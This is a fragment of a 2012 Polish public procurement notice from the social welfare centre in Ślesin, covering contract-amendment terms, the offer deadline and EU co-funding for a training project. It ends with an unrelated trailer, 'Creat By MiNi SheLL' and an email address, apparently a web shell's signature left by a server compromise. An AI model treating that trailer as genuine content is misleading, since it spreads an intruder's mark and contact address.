<p>Zmiana postanowień zawartej umowy oraz wprowadzenie nowych postanowień do umowy możliwe jest w okolicznościach, o których jest mowa, tj.: a) zmiany składu kadry dydaktycznej, po uprzednim uzgodnieniu w formie pisemnej z Wykonawcą , przy czym zmiana wykładowcy wymaga równorzędnego zastępstwa, b) zmiany w terminie realizacji przedmiotu umowy, po uprzednim uzgodnieniu w formie pisemnej z Wykonawcą, c) wystąpienia siły wyższej lub innych okoliczności niezależnych od Wykonawcy lub których Wykonawca przy należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu usługi spowodowane przez osoby trzecie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slesin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Ośrodek Pomocy Społecznej w Ślesinie przy ul. Kleczewskiej 15 /budynek obok UMiG w Ślesinie)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 12:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej w Ślesinie przy ul. Kleczewskiej 15 - biuro kierownika MGOPS /budynek obok UMiG w Ślesinie)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie przewiduje zawarcia umowy ramowej. 2. Szkolenie współfinansowane będzie w ramach projektu KLUCZ DO SUKCESU współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII /Działanie 7.1./ Poddziałanie 7.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com